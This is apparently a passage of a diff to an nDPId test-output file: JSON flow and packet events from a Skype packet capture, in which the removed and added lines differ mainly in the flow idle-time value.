{"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"e4593.g.akamaiedge.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00521{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1573,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":243,"flow_packet_id":2,"flow_last_seen":1431970690190,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":98,"pkt_l4_len":64,"thread_ts_msec":1431970690190,"pkt":"PBXCt3IO0NQSxnP1CABFAABUAABAAEARtyXAqAEBwKgBIgA16YwAQDU7dViBgAABAAEAAAAABWU0NTkzAWcKYWthbWFpZWRnZQNuZXQAAAEAAcAMAAEAAQAAAAsABBfOIaY="} 00808{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1573,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":243,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1431970690133,"flow_last_seen":1431970690190,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1431970690190,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":59788,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"e4593.g.akamaiedge.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"23.206.33.166"}} -00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1574,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":244,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970690191,"flow_last_seen":1431970690191,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970690191,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"23.206.33.166","src_port":51295,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1574,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":244,"flow_packet_id":1,"flow_last_seen":1431970690191,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970690191,"pkt":"0NQSxnP1PBXCt3IOCABFAABA15NAAEAGZ+bAqAEiF84hpshfAbtO4sWoAAAAALAC\/\/\/AXwAAAgQFtAEDAwUBAQgKPjJehwAAAAAEAgAA"} -00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1577,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":244,"flow_packet_id":2,"flow_last_seen":1431970690235,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970690235,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADkGRn4XziGmwKgBIgG7yF8ZBQnnTuLFqaASOJBGLgAAAgQFrAQCCArsPkNyPjJehwEDAwU="} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1578,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":244,"flow_packet_id":3,"flow_last_seen":1431970690235,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970690235,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0z6tAAEAGb9rAqAEiF84hpshfAbtO4sWpGQUJ6IAQECydKQAAAQEICj4yXrLsPkNy"} -00978{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1579,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":244,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1431970690191,"flow_last_seen":1431970690235,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":167,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1431970690235,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"23.206.33.166","src_port":51295,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"apps.skype.com","ja3":"3d49c0a7161d6636fcb6973f14e05046","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1611,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":245,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970690890,"flow_last_seen":1431970690890,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970690890,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.216.125","src_port":51296,"dst_port":12350,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1611,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":245,"flow_packet_id":1,"flow_last_seen":1431970690890,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970690890,"pkt":"0NQSxnP1PBXCt3IOCABFAABAtBpAAEAGkJfAqAEiW77YfchgMD4BM37JAAAAALAC\/\/8o9wAAAgQFtAEDAwUBAQgKPjJhMgAAAAAEAgAA"} -00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1612,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":246,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970690890,"flow_last_seen":1431970690890,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970690890,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.216.24","src_port":51297,"dst_port":12350,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1612,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":246,"flow_packet_id":1,"flow_last_seen":1431970690890,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970690890,"pkt":"0NQSxnP1PBXCt3IOCABFAABAW\/1AAEAG6RnAqAEiW77YGMhhMD6A1I6YAAAAALAC\/\/+Z6gAAAgQFtAEDAwUBAQgKPjJhMgAAAAAEAgAA"} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1614,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":245,"flow_packet_id":2,"flow_last_seen":1431970690943,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970690943,"pkt":"PBXCt3IO0NQSxnP1CABFCAA0q+NAAPUG49Fbvth9wKgBIjA+yGChcdZWATN+yoASH\/5orwAAAgQFoAEDAwQBAQQC"} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1615,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":245,"flow_packet_id":3,"flow_last_seen":1431970690944,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1431970690944,"pkt":"0NQSxnP1PBXCt3IOCABFAAAoE35AAEAGMUzAqAEiW77YfchgMD4BM37KoXHWV1AQIACpaAAA"} -00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1617,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":246,"flow_packet_id":2,"flow_last_seen":1431970690945,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970690945,"pkt":"PBXCt3IO0NQSxnP1CABFCAA8AABAADUGUBNbvtgYwKgBIjA+yGFITqRBgNSOmaASOJAFAQAAAgQFrAQCCAoNH3OiPjJhMgEDAwk="} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1618,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":246,"flow_packet_id":3,"flow_last_seen":1431970690945,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970690945,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0JxlAAEAGHgrAqAEiW77YGMhhMD6A1I6ZSE6kQoAQECxb9QAAAQEICj4yYWgNH3Oi"} -00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1631,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":247,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970691351,"flow_last_seen":1431970691351,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970691351,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"82.224.110.241","src_port":51298,"dst_port":38895,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1631,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":247,"flow_packet_id":1,"flow_last_seen":1431970691351,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970691351,"pkt":"0NQSxnP1PBXCt3IOCABFAABAcRRAAEAGRgjAqAEiUuBu8chil+9r2DTZAAAAALAC\/\/8RNAAAAgQFtAEDAwUBAQgKPjJi9wAAAAAEAgAA"} -00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1634,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":247,"flow_packet_id":2,"flow_last_seen":1431970691419,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970691419,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8K7FAAHIGWW9S4G7xwKgBIpfvyGLApWwfa9g02qASIAC5cwAAAgQFrAEDAwgEAggKAAcb7T4yYvc="} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1635,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":247,"flow_packet_id":3,"flow_last_seen":1431970691419,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970691419,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0AnRAAEAGtLTAqAEiUuBu8chil+9r2DTawKVsIIAQECz3yQAAAQEICj4yYzoABxvt"} -00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1642,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":248,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970691584,"flow_last_seen":1431970691584,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970691584,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.216.125","src_port":51299,"dst_port":12350,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1642,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":248,"flow_packet_id":1,"flow_last_seen":1431970691584,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970691584,"pkt":"0NQSxnP1PBXCt3IOCABFAABA+lxAAEAGSlXAqAEiW77YfchjMD4Tm3MJAAAAALAC\/\/8foQAAAgQFtAEDAwUBAQgKPjJj3QAAAAAEAgAA"} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1646,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":248,"flow_packet_id":2,"flow_last_seen":1431970691636,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970691636,"pkt":"PBXCt3IO0NQSxnP1CABFCAA0Yg5AAPUGLadbvth9wKgBIjA+yGMdRKLvE5tzCoASH\/4ZmQAAAgQFoAEDAwQBAQQC"} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1647,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":248,"flow_packet_id":3,"flow_last_seen":1431970691636,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1431970691636,"pkt":"0NQSxnP1PBXCt3IOCABFAAAosdpAAEAGku\/AqAEiW77YfchjMD4Tm3MKHUSi8FAQIABaUgAA"} -00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1673,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":249,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970691783,"flow_last_seen":1431970691783,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970691783,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"76.167.161.6","src_port":51300,"dst_port":20274,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1673,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":249,"flow_packet_id":1,"flow_last_seen":1431970691783,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970691783,"pkt":"0NQSxnP1PBXCt3IOCABFAABA6ABAAEAGoz\/AqAEiTKehBshkTzK\/rUQGAAAAALAC\/\/\/JZwAAAgQFtAEDAwUBAQgKPjJkoAAAAAAEAgAA"} -00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1684,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":249,"flow_packet_id":2,"flow_last_seen":1431970692055,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970692055,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAAC4GnURMp6EGwKgBIk8yyGRH9b\/zv61EB6AScSDahgAAAgQFrAQCCAq+r8ghPjJkoAEDAwc="} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1685,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":249,"flow_packet_id":3,"flow_last_seen":1431970692055,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1431970692055,"pkt":"0NQSxnP1PBXCt3IOCABFAAAop\/VAAEAG42LAqAEiTKehBshkTzK\/rUQHAAAAAFAEAADlHAAA"} +00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1574,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":244,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970690191,"flow_last_seen":1431970690191,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970690191,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"23.206.33.166","src_port":51295,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1574,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":244,"flow_packet_id":1,"flow_last_seen":1431970690191,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970690191,"pkt":"0NQSxnP1PBXCt3IOCABFAABA15NAAEAGZ+bAqAEiF84hpshfAbtO4sWoAAAAALAC\/\/\/AXwAAAgQFtAEDAwUBAQgKPjJehwAAAAAEAgAA"} +00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1577,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":244,"flow_packet_id":2,"flow_last_seen":1431970690235,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970690235,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADkGRn4XziGmwKgBIgG7yF8ZBQnnTuLFqaASOJBGLgAAAgQFrAQCCArsPkNyPjJehwEDAwU="} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1578,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":244,"flow_packet_id":3,"flow_last_seen":1431970690235,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970690235,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0z6tAAEAGb9rAqAEiF84hpshfAbtO4sWpGQUJ6IAQECydKQAAAQEICj4yXrLsPkNy"} +00978{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1579,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":244,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1431970690191,"flow_last_seen":1431970690235,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":167,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1431970690235,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"23.206.33.166","src_port":51295,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"apps.skype.com","ja3":"3d49c0a7161d6636fcb6973f14e05046","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1611,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":245,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970690890,"flow_last_seen":1431970690890,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970690890,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.216.125","src_port":51296,"dst_port":12350,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1611,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":245,"flow_packet_id":1,"flow_last_seen":1431970690890,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970690890,"pkt":"0NQSxnP1PBXCt3IOCABFAABAtBpAAEAGkJfAqAEiW77YfchgMD4BM37JAAAAALAC\/\/8o9wAAAgQFtAEDAwUBAQgKPjJhMgAAAAAEAgAA"} +00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1612,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":246,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970690890,"flow_last_seen":1431970690890,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970690890,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.216.24","src_port":51297,"dst_port":12350,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1612,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":246,"flow_packet_id":1,"flow_last_seen":1431970690890,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970690890,"pkt":"0NQSxnP1PBXCt3IOCABFAABAW\/1AAEAG6RnAqAEiW77YGMhhMD6A1I6YAAAAALAC\/\/+Z6gAAAgQFtAEDAwUBAQgKPjJhMgAAAAAEAgAA"} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1614,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":245,"flow_packet_id":2,"flow_last_seen":1431970690943,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970690943,"pkt":"PBXCt3IO0NQSxnP1CABFCAA0q+NAAPUG49Fbvth9wKgBIjA+yGChcdZWATN+yoASH\/5orwAAAgQFoAEDAwQBAQQC"} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1615,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":245,"flow_packet_id":3,"flow_last_seen":1431970690944,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1431970690944,"pkt":"0NQSxnP1PBXCt3IOCABFAAAoE35AAEAGMUzAqAEiW77YfchgMD4BM37KoXHWV1AQIACpaAAA"} +00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1617,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":246,"flow_packet_id":2,"flow_last_seen":1431970690945,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970690945,"pkt":"PBXCt3IO0NQSxnP1CABFCAA8AABAADUGUBNbvtgYwKgBIjA+yGFITqRBgNSOmaASOJAFAQAAAgQFrAQCCAoNH3OiPjJhMgEDAwk="} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1618,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":246,"flow_packet_id":3,"flow_last_seen":1431970690945,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970690945,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0JxlAAEAGHgrAqAEiW77YGMhhMD6A1I6ZSE6kQoAQECxb9QAAAQEICj4yYWgNH3Oi"} +00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1631,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":247,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970691351,"flow_last_seen":1431970691351,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970691351,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"82.224.110.241","src_port":51298,"dst_port":38895,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1631,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":247,"flow_packet_id":1,"flow_last_seen":1431970691351,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970691351,"pkt":"0NQSxnP1PBXCt3IOCABFAABAcRRAAEAGRgjAqAEiUuBu8chil+9r2DTZAAAAALAC\/\/8RNAAAAgQFtAEDAwUBAQgKPjJi9wAAAAAEAgAA"} +00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1634,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":247,"flow_packet_id":2,"flow_last_seen":1431970691419,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970691419,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8K7FAAHIGWW9S4G7xwKgBIpfvyGLApWwfa9g02qASIAC5cwAAAgQFrAEDAwgEAggKAAcb7T4yYvc="} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1635,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":247,"flow_packet_id":3,"flow_last_seen":1431970691419,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970691419,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0AnRAAEAGtLTAqAEiUuBu8chil+9r2DTawKVsIIAQECz3yQAAAQEICj4yYzoABxvt"} +00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1642,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":248,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970691584,"flow_last_seen":1431970691584,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970691584,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.216.125","src_port":51299,"dst_port":12350,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 